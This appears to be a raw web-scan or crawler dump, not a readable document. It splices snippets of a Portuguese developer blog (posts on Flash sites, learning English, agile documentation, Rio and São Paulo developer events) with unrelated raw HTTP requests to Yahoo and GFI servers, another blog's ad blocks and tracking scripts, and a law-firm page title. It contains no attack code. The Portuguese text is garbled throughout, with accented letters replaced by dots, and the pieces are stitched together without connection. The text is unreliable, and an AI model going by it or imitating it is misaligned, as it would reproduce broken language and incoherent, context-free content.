onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Mashup_28web_application_hybrid_29?referer=');">mashups</a>, experi..ncia com uso e desenvolvimento de <a href="http://www.programmableweb.com/apis" onclick="urchinTracker('/outgoing/www.programmableweb.com/apis?referer=');">APIs</a> (<a href="http://en.wikipedia.org/wiki/REST" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/REST?referer=');">REST</a>, <a href="http://developer.yahoo.com/yql/" onclick="urchinTracker('/outgoing/developer.yahoo.com/yql/?referer=');">YQL</a>, etc.) e experi..ncia em desenvolvimento para <a href="http://developer.apple.com/devcenter/ios/index.action" onclick="urchinTracker('/outgoing/developer.apple.com/devcenter/ios/index.action?referer=');">iPhone/iPad</a> ...[SNIP]... <p>A empresa oferece contrata....o apenas por CLT e benef..cios como plano de sa..de e vale refei....o. Estamos localizados na <a href="http://maps.google.com/maps?rls=en&q=rua+fidencio+ramos+sao+paulo&oe=UTF-8&um=1&ie=UTF-8&hq=&hnear=R.+Fid..ncio+Ramos+-+Itaim+Bibi,+S..o+Paulo+-+SP,+04551-010,+Brasil" onclick="urchinTracker('/outgoing/maps.google.com/maps?rls=en_038_q=rua+fidencio+ramos+sao+paulo_038_oe=UTF-8_038_um=1_038_ie=UTF-8_038_hq=_038_hnear=R.+Fid_ncio+Ramos+-+Itaim+Bibi_+S_o+Paulo+-+SP_+04551-010_+Brasil&referer=');">Vila Ol..mpia em S..o Paulo</a> ...[SNIP]... <strong>Se voc.. se encaixa neste perfil, envie seu curriculo em ingl..s para mim (gc AT yahoo-inc.com) com uma lista dos ..ltimos 3 livros t..cnicos que leu. N..o esque..a de colocar links para o seu <a href="http://twitter.com" onclick="urchinTracker('/outgoing/twitter.com?referer=');">Twitter</a>, <a href="http://linkedin.com" onclick="urchinTracker('/outgoing/linkedin.com?referer=');">LinkedIn</a>, <a href="http://github.com" onclick="urchinTracker('/outgoing/github.com?referer=');">GitHub</a> ...[SNIP]... ir para l.., mas primeiro queria ver se eles n..o estavam com fila de espera tamb..m. Quando entrei no site do restaurante para pegar o telefone e ligar… n..o funcionou porque o site .. feito em <a href="http://www.adobe.com/products/flashplayer/" onclick="urchinTracker('/outgoing/www.adobe.com/products/flashplayer/?referer=');">Flash</a> – que n..o funciona no <a href="http://www.apple.com/iphone/" onclick="urchinTracker('/outgoing/www.apple.com/iphone/?referer=');">iPhone</a>.</p> <p>Quem me acompanha no <a href="http://twitter.com/gchapiewski" onclick="urchinTracker('/outgoing/twitter.com/gchapiewski?referer=');">Twitter</a> j.. deve ter percebido h.. tempos que eu n..o sou muito f.. de Flash, mas quando eu fa..o os meus “<a href="http://en.wikipedia.org/wiki/Rant" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Rant?referer=');">rants</a> ...[SNIP]... <p>Se f..ssemos discutir esse epis..dio do ponto de vista do usu..rio, a primeira coisa que algu..m falaria seria “ah, voc.. deveria ter um <a href="http://www.android.com" onclick="urchinTracker('/outgoing/www.android.com?referer=');">Android</a> ...[SNIP]... <p>A maioria das informa....es dos sites em Flash ficam dentro de um arquivo compilado que n..o .. lido pelos “<a href="http://pt.wikipedia.org/wiki/Web_crawler" onclick="urchinTracker('/outgoing/pt.wikipedia.org/wiki/Web_crawler?referer=');">crawlers</a> ...[SNIP]... <p>Pessoas com defici..ncia visual utilizam “<a href="http://www.disabled-world.com/assistivedevices/computer/screen-readers.php" onclick="urchinTracker('/outgoing/www.disabled-world.com/assistivedevices/computer/screen-readers.php?referer=');">screen readers</a> ...[SNIP]... ituem a barra de rolagem nativa do navegador por uma espec..fica do Flash. Esse sim .. um problema terr..vel, porque at.. o scroll do mouse para de funcionar. Quer ver como .. perturbador? Ent..o veja <a href="http://www.upfrontstage.com.br" onclick="urchinTracker('/outgoing/www.upfrontstage.com.br?referer=');">este site</a> ...[SNIP]... <p>Veja <a href="http://www.modamercatto.com.br" onclick="urchinTracker('/outgoing/www.modamercatto.com.br?referer=');">este site</a>. Eu que n..o sou nenhum especialista em <a href="http://en.wikipedia.org/wiki/User_experience" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/User_experience?referer=');">UX</a> ...[SNIP]... anda fizeram com que o trackpad do meu notebook n..o funcione corretamente, proporcionando assim a maneira mais lenta e tediosa poss..vel de rolar para achar a informa....o que eu preciso. Agora veja <a href="http://www.espacofashion.com.br" onclick="urchinTracker('/outgoing/www.espacofashion.com.br?referer=');">este outro site</a> ...[SNIP]... <p>Sites em Flash n..o funcionam em <a href="http://www.apple.com/iphone/" onclick="urchinTracker('/outgoing/www.apple.com/iphone/?referer=');">iPhones</a> e <a href="http://www.apple.com/ipad/" onclick="urchinTracker('/outgoing/www.apple.com/ipad/?referer=');">iPads</a> ...[SNIP]... siva de aparelhos. Assim como voc.. se preocupa em desenvolver sites compat..veis com v..rios navegadores, voc.. precisa se preocupar com dispositivos m..veis. Seria muito mais f..cil desenvolver para <a href="http://br.mozdev.org" onclick="urchinTracker('/outgoing/br.mozdev.org?referer=');">Firefox</a> somente, mas infelizmente h.. um grande n..mero de usu..rios que usam <a href="http://www.microsoft.com/brasil/windows/internet-explorer/" onclick="urchinTracker('/outgoing/www.microsoft.com/brasil/windows/internet-explorer/?referer=');">Internet Explorer</a> (incluindo <a href="http://ie6update.com" onclick="urchinTracker('/outgoing/ie6update.com?referer=');">IE6</a> ...[SNIP]... <p>Existem um monte de ferramentas que te permitem criar sites funcionais, r..pidos, acess..veis e eficientes. Mais recentemente com o <a href="http://pt.wikipedia.org/wiki/HTML5" onclick="urchinTracker('/outgoing/pt.wikipedia.org/wiki/HTML5?referer=');">HTML5</a>, muitas das coisas que antes s.. eram poss..veis com Flash (ou <a href="http://silverlight.net" onclick="urchinTracker('/outgoing/silverlight.net?referer=');">Silverlight</a> ...[SNIP]... <p>H.. n..o muito tempo uma pessoa me procurou no <a href="http://en.wikipedia.org/wiki/Instant_messaging" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Instant_messaging?referer=');">IM</a> para conversar sobre sua carreira. Ela me disse que no momento estava fazendo um curso de <a href="http://www.java.com" onclick="urchinTracker('/outgoing/www.java.com?referer=');">Java</a> e me perguntou o que exatamente ela precisava para trabalhar numa empresa como o <a href="http://yahoo.com" onclick="urchinTracker('/outgoing/yahoo.com?referer=');">Yahoo!</a> ...[SNIP]... ntes s.. est..o dispon..veis em ingl..s. Poucos t..tulos s..o traduzidos e quando s..o levam alguns meses (ou anos) para tal, isso sem contar que as tradu....es muitas vezes s..o ruins. Por exemplo, o <a href="http://www.amazon.com/Domain-Driven-Design-Tackling-Complexity-Software/dp/0321125215/" onclick="urchinTracker('/outgoing/www.amazon.com/Domain-Driven-Design-Tackling-Complexity-Software/dp/0321125215/?referer=');"><em> ...[SNIP]... </a> do <a href="http://domaindrivendesign.org/about" onclick="urchinTracker('/outgoing/domaindrivendesign.org/about?referer=');">Eric Evans</a> levou aproximadamente 5 anos para ser traduzido, o <a href="http://www.amazon.com/Patterns-Enterprise-Application-Architecture-Martin/dp/0321127420/" onclick="urchinTracker('/outgoing/www.amazon.com/Patterns-Enterprise-Application-Architecture-Martin/dp/0321127420/?referer=');"><em> ...[SNIP]... </a> do <a href="http://martinfowler.com" onclick="urchinTracker('/outgoing/martinfowler.com?referer=');">Martin Fowler</a> ...[SNIP]... </a>), mas grandes nomes como <a href="http://www.objectmentor.com/omTeam/martin_r.html" onclick="urchinTracker('/outgoing/www.objectmentor.com/omTeam/martin_r.html?referer=');">Robert Martin</a>, <a href="http://alistair.cockburn.us" onclick="urchinTracker('/outgoing/alistair.cockburn.us?referer=');">Alistair Cockburn</a>, <a href="http://www.threeriversinstitute.org/blog/" onclick="urchinTracker('/outgoing/www.threeriversinstitute.org/blog/?referer=');">Kent Beck</a> – e mais algumas dezenas que eu poderia citar – escrevem em ingl..s. Isso sem contar as d..zias de blogs como o <a href="http://techcrunch.com" onclick="urchinTracker('/outgoing/techcrunch.com?referer=');">TechCrunch</a>, <a href="http://mashable.com" onclick="urchinTracker('/outgoing/mashable.com?referer=');">Mashable</a>, <a href="http://highscalability.com/blog/" onclick="urchinTracker('/outgoing/highscalability.com/blog/?referer=');">High Scalability</a> ou at.. mesmo o <a href="http://xkcd.com" onclick="urchinTracker('/outgoing/xkcd.com?referer=');">xkcd</a> ...[SNIP]... <p>Em terceiro lugar, a maioria dos projetos Open Source relevantes s..o em ingl..s. Por exemplo, voc.. est.. acompanhando o desenvolvimento do <a href="http://nodejs.org" onclick="urchinTracker('/outgoing/nodejs.org?referer=');">Node.js</a>? Voc.. j.. estudou <a href="http://clojure.org" onclick="urchinTracker('/outgoing/clojure.org?referer=');">Clojure</a>? E o <a href="http://rubyonrails.org" onclick="urchinTracker('/outgoing/rubyonrails.org?referer=');">Rails 3</a>? <a href="http://en.wikipedia.org/wiki/Linux" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Linux?referer=');">Linux</a>? <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a>? Projetos da <a href="http://apache.org" onclick="urchinTracker('/outgoing/apache.org?referer=');">Apache Foundation</a> ...[SNIP]... <p>Existe um mito de que n..o se documenta em projetos que usam <a href="http://pt.wikipedia.org/wiki/Desenvolvimento_%C3%A1gil_de_software" onclick="urchinTracker('/outgoing/pt.wikipedia.org/wiki/Desenvolvimento_C3_A1gil_de_software?referer=');">metodologias de desenvolvimento ..gil</a> ...[SNIP]... <p>A grande diferen..a entre projetos <a href="http://en.wikipedia.org/wiki/Waterfall_model" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Waterfall_model?referer=');">“tradicionais”</a> ...[SNIP]... esso (que geralmente .. muita coisa). Voc.. n..o pensa no que est.. fazendo, simplesmente segue o que foi definido e escreve documentos. Em m..todos ..geis n..o h.. prescri....o de documenta....o (e o <a href="http://agilemanifesto.org" onclick="urchinTracker('/outgoing/agilemanifesto.org?referer=');">manifesto ..gil fala tamb..m sobre “software funcionando mais do que documenta....o”</a> ...[SNIP]... <p>Assim como voc.. deve <a href="http://www.artima.com/intv/simplest2.html" onclick="urchinTracker('/outgoing/www.artima.com/intv/simplest2.html?referer=');">implementar apenas o necess..rio para entregar uma funcionalidade e n..o mais do que isso</a> ...[SNIP]... <p>Documentar tem que ser r..pido, n..o pode dar trabalho. Use ferramentas como <a href="http://en.wikipedia.org/wiki/Wiki" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Wiki?referer=');">wikis</a>, <a href="http://en.wikipedia.org/wiki/Documentation_generator" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Documentation_generator?referer=');">geradores de documenta....o</a> (como o <a href="http://sphinx.pocoo.org" onclick="urchinTracker('/outgoing/sphinx.pocoo.org?referer=');">Sphinx</a> ...[SNIP]... e ser acessada (e tiver busca) ela fica mais ..til. Al..m disso, prefira usar uma tecnologia f..cil e conhecida para que todos os membros do time possam documentar. Por exemplo, se voc.. escolher usar <a href="http://en.wikipedia.org/wiki/LaTeX" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/LaTeX?referer=');">LaTeX</a> ...[SNIP]... <p>Se o seu projeto precisa de documenta....o por qualquer motivo, a documenta....o deve fazer parte da <a href="http://agilefaq.net/2007/10/24/what-is-definition-of-done/" onclick="urchinTracker('/outgoing/agilefaq.net/2007/10/24/what-is-definition-of-done/?referer=');">“Definition of Done”</a>. .. melhor documentar no momento que as <a href="http://en.wikipedia.org/wiki/User_story" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/User_story?referer=');">hist..rias</a> ...[SNIP]... <p><a href="http://en.wikipedia.org/wiki/Code_smell" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Code_smell?referer=');">“Code smell”</a> .. um sintoma no seu c..digo que pode indicar um problema maior. Muitas vezes c..digos precisam ser documentados porque eles s..o desnecessariamente complexos. Sempre que poss..vel <a href="http://guilherme.pro/2009/04/05/why-i-dont-write-code-comments/" onclick="urchinTracker('/outgoing/guilherme.pro/2009/04/05/why-i-dont-write-code-comments/?referer=');">prefira refatorar o c..digo para ele ficar mais f..cil de entender ao inv..s de escrever coment..rios</a> ...[SNIP]... muda e o coment..rio fica l.. desatualizado, e isso acaba mais atrapalhando do que ajudando). Tenha uma boa suite de testes (uma suite bem escrita e organizada .. uma especifica....o execut..vel), use <a href="http://en.wikipedia.org/wiki/Domain-driven_design" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Domain-driven_design?referer=');">Domain-Driven Design</a> para expressar melhor o dom..nio do software, <a href="http://www.c2.com/cgi/wiki?SystemMetaphor" onclick="urchinTracker('/outgoing/www.c2.com/cgi/wiki?SystemMetaphor&referer=');">met..foras</a>, tenha um <a href="http://c2.com/xp/XpSimplicityRules.html" onclick="urchinTracker('/outgoing/c2.com/xp/XpSimplicityRules.html?referer=');">design simples</a>, use <a href="http://en.wikipedia.org/wiki/Design_pattern_%28computer_science%29" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Design_pattern_28computer_science_29?referer=');">design patterns</a> ...[SNIP]... </a> no Rio de Janeiro, criado e organizado por mim e o <a href="http://henriquebastos.net" onclick="urchinTracker('/outgoing/henriquebastos.net?referer=');">Henrique Bastos</a> ...[SNIP]... <p>Organizar esse evento foi uma experi..ncia excepcional. Para come..ar, tivemos a sorte de todos os planetas se alinharem e termos <a href="http://twitter.com/cozimek" onclick="urchinTracker('/outgoing/twitter.com/cozimek?referer=');">v..rios</a> <a href="http://twitter.com/jacobian" onclick="urchinTracker('/outgoing/twitter.com/jacobian?referer=');">amigos</a> <a href="http://twitter.com/jeffpatton" onclick="urchinTracker('/outgoing/twitter.com/jeffpatton?referer=');">internacionais</a> presentes no Rio de Janeiro na mesma semana. Quando decidimos tornar isso um evento, a <a href="http://twitter.com/akitaonrails" onclick="urchinTracker('/outgoing/twitter.com/akitaonrails?referer=');">galera</a> <a href="http://twitter.com/guilhermecaelum" onclick="urchinTracker('/outgoing/twitter.com/guilhermecaelum?referer=');">aqui</a> <a href="http://twitter.com/paulo_caelum" onclick="urchinTracker('/outgoing/twitter.com/paulo_caelum?referer=');">do</a> <a href="http://twitter.com/viniciusteles" onclick="urchinTracker('/outgoing/twitter.com/viniciusteles?referer=');">Brasil</a> ...[SNIP]... inscri....es e organizar todo o evento. Organizar uma confer..ncia de alta qualidade com palestrantes renomados foi uma experi..ncia ..nica, tanto para aprender o qu..o complicado .. quanto para poder <a href="http://vimeo.com/6604215" onclick="urchinTracker('/outgoing/vimeo.com/6604215?referer=');">curtir um gigantesco #horaextra</a> ...[SNIP]... <p>Mas num dos encontros mais recentes do <a href="http://horaextra.org" onclick="urchinTracker('/outgoing/horaextra.org?referer=');">#horaextra</a>, a galera decidiu se organizar para montar um outro evento. Liderados pelo Andr.. Fonseca, Ramon Page, Rodrigo Pinto e Sylvestre Mergulh..o, todos se dispuseram a colaborar com alguma <a href="http://smallactsmanifesto.org" onclick="urchinTracker('/outgoing/smallactsmanifesto.org?referer=');">pequena a....o</a> ...[SNIP]... <p>.. com muita felicidade que eu escrevo este post para dar a boa not..cia: vem a.. o <a href="http://devinrio.com.br" onclick="urchinTracker('/outgoing/devinrio.com.br?referer=');">Dev in Rio 2010</a> ...[SNIP]... <li>Um evento onde o #horaextra faz parte da programa....o (com direito a <a href="http://vimeo.com/6597629" onclick="urchinTracker('/outgoing/vimeo.com/6597629?referer=');">hino</a> ...[SNIP]... <p>Aguardem o <a href="http://devinrio.com.br" onclick="urchinTracker('/outgoing/devinrio.com.br?referer=');">Dev in Rio 2010</a> ...[SNIP]... <p>Na ..ltima sexta-feira (30 de Julho) n..s hospedamos aqui no escrit..rio do <a href="http://br.yahoo.com" onclick="urchinTracker('/outgoing/br.yahoo.com?referer=');">Yahoo!</a> nossa primeira reuni..o do grupo <a href="http://www.dojosp.org" onclick="urchinTracker('/outgoing/www.dojosp.org?referer=');">Coding Dojo SP</a> ...[SNIP]... <img src='http://gc.blog.br/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Recebemos por volta de 30 desenvolvedores que participaram de um <a href="http://codingdojo.org/cgi-bin/wiki.pl?RandoriKata" onclick="urchinTracker('/outgoing/codingdojo.org/cgi-bin/wiki.pl?RandoriKata&referer=');">Randori</a> para resolver o problema de escrever n..meros por extenso em <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a> (gra..as .. influ..ncia do nosso amigo Pythonista “<a href="http://isnomore.net" onclick="urchinTracker('/outgoing/isnomore.net?referer=');">rbp</a> ...[SNIP]... <p>Acabei de escrever um <a href="http://developer.yahoo.net/blog/archives/2010/08/coding_dojo_sao_paulo.html" onclick="urchinTracker('/outgoing/developer.yahoo.net/blog/archives/2010/08/coding_dojo_sao_paulo.html?referer=');">post no blog do Yahoo! Developer Network contando com mais detalhes como foi o encontro</a> (e explicando tamb..m o que diabos .. um <a href="http://codingdojo.org" onclick="urchinTracker('/outgoing/codingdojo.org?referer=');">Coding Dojo</a>). Voc.. tamb..m pode ver algumas <a href="http://www.flickr.com/photos/guilhermechapiewski/sets/72157624640168810/" onclick="urchinTracker('/outgoing/www.flickr.com/photos/guilhermechapiewski/sets/72157624640168810/?referer=');">fotos no meu Flickr</a> ...[SNIP]... <p>O pr..ximo encontro ser.. na semana que vem, ainda sem data definida. Para ficar por dentro das datas dos pr..ximos encontros, cadastre-se na <a href="http://groups.google.com/group/dojo_sp/" onclick="urchinTracker('/outgoing/groups.google.com/group/dojo_sp/?referer=');">lista de e-mails do grupo</a> ...[SNIP]... <p>H.. uns dois meses estava eu numa madrugada t..pica brincado de escrever c..digos aleat..rios, dessa vez usando o <a href="http://code.google.com/appengine/" onclick="urchinTracker('/outgoing/code.google.com/appengine/?referer=');">Google App Engine</a> ...[SNIP]... </strong> demais) fiquei t..o empolgado que soltei um daqueles posts meio aleat..rios no <a href="http://twitter.com" onclick="urchinTracker('/outgoing/twitter.com?referer=');">Twitter</a> ...[SNIP]... <i>“<a href="http://twitter.com/gchapiewski/status/12489805973" onclick="urchinTracker('/outgoing/twitter.com/gchapiewski/status/12489805973?referer=');">Google App Engine kicks serious ass!</a> ...[SNIP]... </i>. Muita gente estranhou, incluindo o meu amigo <a href="http://www.kumpera.net/blog/" onclick="urchinTracker('/outgoing/www.kumpera.net/blog/?referer=');">Rodrigo Kumpera</a> ...[SNIP]... <i>“<a href="http://twitter.com/kumpera/status/12498606245" onclick="urchinTracker('/outgoing/twitter.com/kumpera/status/12498606245?referer=');">@gchapiewski I thought you used to work for yahoo!</a> ...[SNIP]... </a> que fizemos em S..o Paulo em mar..o. Muitas pessoas acharam estranho e ficaram abismadas pelo fato do <a href="http://yahoo.com" onclick="urchinTracker('/outgoing/yahoo.com?referer=');">Yahoo!</a> e seus funcion..rios mostrarem hacks que faziam uso de <a href="http://maps.google.com" onclick="urchinTracker('/outgoing/maps.google.com?referer=');">Google Maps</a>, <a href="http://twitter.com" onclick="urchinTracker('/outgoing/twitter.com?referer=');">Twitter</a>, <a href="http://facebook.com" onclick="urchinTracker('/outgoing/facebook.com?referer=');">Facebook</a> ...[SNIP]... blog.br/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> Agora que eu trabalho no Yahoo! tenho que usar Y! Mail ao inv..s de Gmail? Ou ent..o tenho que programar usando apenas <a href="http://developer.yahoo.com/yui/" onclick="urchinTracker('/outgoing/developer.yahoo.com/yui/?referer=');">YUI</a> ao inv..s de <a href="http://jquery.com" onclick="urchinTracker('/outgoing/jquery.com?referer=');">jQuery</a> ...[SNIP]... </a>, mas n..o .. o que eu acredito. N..o me importo de usar <a href="http://java.sun.com" onclick="urchinTracker('/outgoing/java.sun.com?referer=');">Java</a> se for a melhor op....o para resolver meus problemas – apesar de adorar programar em <a href="http://www.ruby-lang.org" onclick="urchinTracker('/outgoing/www.ruby-lang.org?referer=');">Ruby</a>. Ou de aprender uma nova linguagem/ferramenta se ela se mostrar melhor para resolver alguma coisa (como quando eu precisei aprender <a href="http://www.actionscript.org" onclick="urchinTracker('/outgoing/www.actionscript.org?referer=');">ActionScript</a> para fazer coisas legais para o <a href="http://video.globo.com" onclick="urchinTracker('/outgoing/video.globo.com?referer=');">Globo V..deos</a> – apesar de eu nunca ter tido simpatia por <a href="http://www.adobe.com/products/flashplayer/" onclick="urchinTracker('/outgoing/www.adobe.com/products/flashplayer/?referer=');">Flash</a> ...[SNIP]... o profissional baseado em fatos e dados, n..o em prefer..ncias, traumas ou qualquer outro argumento sem l..gica. No caso que comecei a contar no in..cio desse post, eu estava programando um webservice <a href="http://en.wikipedia.org/wiki/Representational_State_Transfer" onclick="urchinTracker('/outgoing/en.wikipedia.org/wiki/Representational_State_Transfer?referer=');">REST</a> em <a href="http://python.org" onclick="urchinTracker('/outgoing/python.org?referer=');">Python</a> ...[SNIP]... <p>Veja s.., eu n..o acordo todo dia e vou para o trabalho s.. porque quero ganhar dinheiro ou porque sou obrigado a fazer isso. N..o fico <a href="http://twitter.com/gchapiewski/status/16757477472" onclick="urchinTracker('/outgoing/twitter.com/gchapiewski/status/16757477472?referer=');">at.. as 5 horas da manh.. hackeando as “entranhas” do Rhino com Java</a> ...[SNIP]... <param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=10713842&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=00ADEF&fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=10713842&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=00ADEF&fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="450" height="253"></embed> ...[SNIP]... </param><embed src="http://www.youtube.com/v/mIP4GLhtucI&hl=en_US&fs=1&" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="450" height="360"></embed> ...[SNIP]... <p>As fotos oficiais do evento est..o dispon..veis no <a href="http://www.flickr.com/photos/brhackday" onclick="urchinTracker('/outgoing/www.flickr.com/photos/brhackday?referer=');">nosso Flickr</a>. Temos tamb..m fotos tiradas pelos participantes <a href="http://www.flickr.com/groups/brhackday/pool/" onclick="urchinTracker('/outgoing/www.flickr.com/groups/brhackday/pool/?referer=');">no grupo “brhackday” do Flickr</a> ...[SNIP]... <div class="textwidget"><a rel="license" href="http://creativecommons.org/licenses/by/2.5/br/" onclick="urchinTracker('/outgoing/creativecommons.org/licenses/by/2.5/br/?referer=');"><img alt="Creative Commons License" style="border-width:0" src="http://creativecommons.org/images/public/somerights20.png" /></a> ...[SNIP]... </span> by <a xmlns:cc="http://creativecommons.org/ns#" href="http://guilherme.pro" property="cc:attributionName" rel="cc:attributionURL" onclick="urchinTracker('/outgoing/guilherme.pro?referer=');">Guilherme Chapiewski</a> está licenciado sob uma <a rel="license" href="http://creativecommons.org/licenses/by/2.5/br/" onclick="urchinTracker('/outgoing/creativecommons.org/licenses/by/2.5/br/?referer=');">Creative Commons Attribution 2.5 Brazil License</a> ...[SNIP]... <li><a href="http://m.artins.net" onclick="urchinTracker('/outgoing/m.artins.net?referer=');">Alexandre Martins Nunes</a> ...[SNIP]... <li><a href="http://anselmoalves.com" onclick="urchinTracker('/outgoing/anselmoalves.com?referer=');">Anselmo Alves</a> ...[SNIP]... <li><a href="http://acarlos.com.br/blog" onclick="urchinTracker('/outgoing/acarlos.com.br/blog?referer=');">Antonio Carlos Silveira</a> ...[SNIP]... <li><a href="http://blog.caelum.com.br" onclick="urchinTracker('/outgoing/blog.caelum.com.br?referer=');">Caelum</a></li> <li><a href="http://lixo.org" onclick="urchinTracker('/outgoing/lixo.org?referer=');">Carlos Villela</a> ...[SNIP]... <li><a href="http://bardusco.wordpress.com" onclick="urchinTracker('/outgoing/bardusco.wordpress.com?referer=');">Danilo Bardusco</a> ...[SNIP]... <li><a href="http://dtsato.com/blog/default" onclick="urchinTracker('/outgoing/dtsato.com/blog/default?referer=');">Danilo Sato</a> ...[SNIP]... <li><a href="http://plentz.org" onclick="urchinTracker('/outgoing/plentz.org?referer=');">Diego Pires Plentz</a> ...[SNIP]... <li><a href="http://akitaonrails.com" onclick="urchinTracker('/outgoing/akitaonrails.com?referer=');">Fabio Akita</a> ...[SNIP]... <li><a href="http://fabiokung.com" onclick="urchinTracker('/outgoing/fabiokung.com?referer=');">Fabio Kung</a> ...[SNIP]... <li><a href="http://guilherme.pro" onclick="urchinTracker('/outgoing/guilherme.pro?referer=');">Guilherme Chapiewski (en-US)</a> ...[SNIP]... <li><a href="http://gcirne.wordpress.com" onclick="urchinTracker('/outgoing/gcirne.wordpress.com?referer=');">Guilherme Cirne</a> ...[SNIP]... <li><a href="http://henriquebastos.net" onclick="urchinTracker('/outgoing/henriquebastos.net?referer=');">Henrique Bastos</a> ...[SNIP]... <li><a href="http://tapajos.me" onclick="urchinTracker('/outgoing/tapajos.me?referer=');">Marcos Tapaj..s</a> ...[SNIP]... <li><a href="http://www.fragmental.com.br" onclick="urchinTracker('/outgoing/www.fragmental.com.br?referer=');">Phillip Cal..ado</a> ...[SNIP]... <li><a href="http://blog.aspercom.com.br" onclick="urchinTracker('/outgoing/blog.aspercom.com.br?referer=');">Rodrigo Yoshima</a> ...[SNIP]... <li><a href="http://blog.improveit.com.br" onclick="urchinTracker('/outgoing/blog.improveit.com.br?referer=');">Vin..cius Manh..es Teles</a> ...[SNIP]... <p><script src="http://widgets.twimg.com/j/1/widget.js"></script></p> <link href="http://widgets.twimg.com/j/1/widget.css" type="text/css" rel="stylesheet"> <script> ...[SNIP]... <div class="textwidget"><script type="text/javascript" src="http://www.google.com/reader/ui/publisher-en.js"></script> <script type="text/javascript" src="http://www.google.com/reader/public/javascript/user/13324626892444451583/state/com.google/broadcast?n=10&callback=GRC_p(%7Bc%3A%22blue%22%2Ct%3A%22%22%2Cs%3A%22false%22%2Cb%3A%22false%22%7D)%3Bnew%20GRC"></script> ...[SNIP]... </div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script> ...[SNIP]... <p> Guilherme Chapiewski is proudly powered by <a href="http://wordpress.org/" onclick="urchinTracker('/outgoing/wordpress.org/?referer=');">WordPress</a> ...[SNIP]... <!-- Gorgeous design by Michael Heilemann - http://binarybonsai.com/kubrick/ -->
GET /event-log-analysis-sm/?adv=69&loc=727&client=ca-dp-sphere_related_xml HTTP/1.1 Host: landesm.gfi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Event log analysis & management</title>
GET /config/login?.src=fpctx&logout=1&r= HTTP/1.1 Host: login.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 19 Jan 2011 18:09:21 GMT Set-Cookie: B=76otfft6jea6h&b=3&s=5d; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: Y=%2e; expires=Tue, 19-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: T=z=0; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com Set-Cookie: SSL=%2e; expires=Thu, 01 Jan 1970 22:00:00 GMT; path=/; domain=.yahoo.com; secure P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" X-Frame-Options: DENY Cache-Control: private Connection: close Content-Type: text/html Content-Length: 18382
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<p style="text-align: center"><a href="http://beonthe.net" title="Tenha seu site em 24h com o Be on the Net"> <img src="http://beonthe.net/accounts/beonthe.net/images/tenha_site_beonthenet_160x55.png" alt="Crie um site em 24h com o Be on the Net" title="Tenha seu site em 24h com o Be on the Net" /> </a></p>
<p style="text-align: center"><a href="http://bigbangcafe.net/" title="Apaixonados por camisetas originais, criativas e de qualidade"> <img src="http://rafael.adm.br/wp-content/uploads/2009/12/bbcafe_tees.png" alt="Apaixonados por camisetas originais, criativas e de qualidade" title="Apaixonados por camisetas originais, criativas e ...[SNIP]... <span class="menu"> | Powered by <a href="http://wordpress.org/">WordPress</a> ...[SNIP]... <p><a href="http://woothemes.com" title="WooThemes"><img src="http://rafael.adm.br/wp-content/themes/mainstream/images/woothemes.png" alt="WooThemes Logo" /> ...[SNIP]... </script> <script type="text/javascript" src="http://tcr.tynt.com/javascripts/Tracer.js?user=cYiTaGq0mr37xaadbiUzgI&s=160...=pb"></script> ...[SNIP]... </script> <script src="http://cdn.wibiya.com/Toolbars/dir_0009/Toolbar_9298/Loader_9298.js" type="text/javascript"></script> <script type="text/javascript" id="navegg" src="http://lt.navegg.com/lt.js?12596"></script> ...[SNIP]...
<title>Skadden - SEC Enforcement and Compliance</title>
